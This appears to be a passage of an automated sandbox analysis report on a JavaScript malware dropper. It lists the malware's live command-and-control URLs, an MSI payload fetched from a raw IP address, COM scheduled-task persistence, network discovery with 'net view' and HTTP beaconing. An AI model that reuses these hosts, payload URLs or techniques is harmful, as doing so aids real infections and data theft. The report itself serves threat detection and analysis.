Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \*.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \Registry\Machine\
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: https://jarinamaers.shop/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: https://wrankaget.site/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Desktop
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Startup
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Personal
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Local AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \update_data.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS\|%d\|%s

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

6_2_000000018003BC0C

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AF79 FindFirstFileExW,	4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000001A379501A08

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.59.82 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor	URLs: https://wrankaget.site/live/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000187EC858D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

6_2_00000187EC858D90

Source: global traffic

HTTP traffic detected: GET /ad.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: 45.95.11.217

Source: global traffic	DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic	DNS traffic detected: DNS query: grizmotras.com

Source: unknown

Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2032880345.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035225115.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, Document_a19_79b555791-28h97348k5477-3219g9.js	String found in binary or memory: http://45.95.11.217/ad.msi
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msi%
Source: ~DF428E4FF550ED71C3.TMP.2.dr	String found in binary or memory: http://45.95.11.217/ad.msi-1780707424311028180
Source: ~DF3025BC11E5C97B03.TMP.2.dr, ~DFE66F7BB54D4BA8DC.TMP.2.dr, ~DFAB72B8B8E96537BE.TMP.2.dr, ~DF22CBD4461B033FB8.TMP.2.dr, ~DF0C3825C8A6AE7DC2.TMP.2.dr, inprogressinstallinfo.ipi.2.dr	String found in binary or memory: http://45.95.11.217/ad.msi0
Source: wscript.exe, 00000000.00000003.2156644454.00000207B4D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msiLin
Source: wscript.exe, 00000000.00000002.2158447349.00000207B5459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msiV
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.dig
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digice7
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
Source: rundll32.exe	String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp, MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr4(
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: rundll32.exe	String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe	String found in binary or memory: http://pscan.f.360.cn/safe_update.php
